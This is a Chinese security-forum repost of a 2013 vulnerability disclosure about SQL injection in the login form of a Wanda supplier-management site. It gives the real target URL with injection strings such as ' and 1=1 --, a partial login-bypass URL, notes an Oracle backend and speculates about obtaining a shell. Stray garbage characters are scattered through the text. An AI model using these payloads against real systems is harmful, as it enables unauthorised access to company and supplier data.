找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2583|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。6 t/ F$ `& d" h  [0 P' ]
详细说明:6 p( c6 g3 ]7 b# \; q
万达scm系统登陆框sql注入。
0 X& C5 f- T# v" V9 o% I1 t0 p# O$ T! M( |$ X5 w
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
  U0 i! \9 W6 }8 @' P0 k3 j% |$ ]3 N/ c. k/ H5 P' N) K5 |

7 M  C0 Q- S" G; m) K. v; o# e( c500错误。
, o4 t8 s, j: t* H* c) d
/ \2 m7 J4 d/ M. E& ~% _用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
% H6 y; S% A1 Y# b" C$ c$ z& D6 jhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
/ I( T/ m7 H; y+ o0 q8 f0 g) G截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)# i6 w3 F; ]7 X4 i0 l
经过分析,登陆验证的过程应该是:, A' Y9 V4 p4 w2 [3 X
+ C7 R: E- I0 n( q# b. i1 M% r( X5 V# ?
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。0 J0 i* L5 `' x' _; r
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png9 e' o( w3 L- O. m8 t

% S& V5 K( [, [$ N; T6 qoracle数据库,存在注入点。@大连万达,你怎么看?
- J# P% s5 H! ~  ?! ohttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png- e: m; P: Z5 b
6 L# F: l4 l% W" N
系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。* Q5 T9 H2 L8 `- B# X6 W
漏洞证明:2 F. F0 S& b/ I6 P: f& M
万达scm系统登陆框sql注入。
+ \$ c5 Q, p& L* A- r: q
2 \9 b+ E7 G0 |- a5 i3 `, Jhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27- a9 r* N/ x5 H; i* M' P1 u

$ a! ?1 r9 N6 k. u$ [
) s  E" X1 o% M# N500错误。
; O# f) _  P+ x9 K: ]- Q" `4 L, U8 P7 O* @
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
5 t5 L/ Y- i, c2 B0 ]' m! z& I2 Hhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png( D. k, h0 w' Z

3 |+ v0 }9 L; w7 H: Q  O* R$ ]" s+ A- L* H2 t
(截图有一点问题)" E3 @6 I4 r9 P
8 `" a5 l/ B  \/ s. z
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:  P) z- E6 y/ o) U6 ~8 t3 A, \+ i3 B

4 ?) Q1 G& k8 x* R" r9 ?取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。" X0 C6 m  }' S) m
$ X/ u4 q. t8 K: N: `* |. E. ^" i
绕过:
6 G/ y. T" B5 L1 {4 ?4 Yhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1' ], e8 v; l8 M6 Q, z$ G. f

" M9 e; _( g2 G& P5 U# W8 f
# W9 J& i/ c- z& `7 coracle数据库,存在注入点。@大连万达,你怎么看?
# n4 @# i6 e: {! _" M! S​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
3 R1 R1 `6 e% k  P8 e* f8 x- y/ N9 A! _! `. U; ^
修复方案:
5 A3 D  i5 _( @2 B+ }: `' V9 _。。。
, G  n9 T* r7 U$ W
2 K" {$ R) g& |+ E- |, b4 g1 k8 O" J
厂商已经确认
5 u9 g, Z) J7 w) Q
# V3 o0 \6 `$ g1 A3 s% A6 a/ S6 b$ o0 }[/td][/tr]9 A, p4 [6 i$ U1 H1 Y
[/table]; j- q6 E# m9 P+ z4 ^
( F! }6 s2 S/ P" J! B' T
4 _1 S* }* Y$ @) |" V4 f$ B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表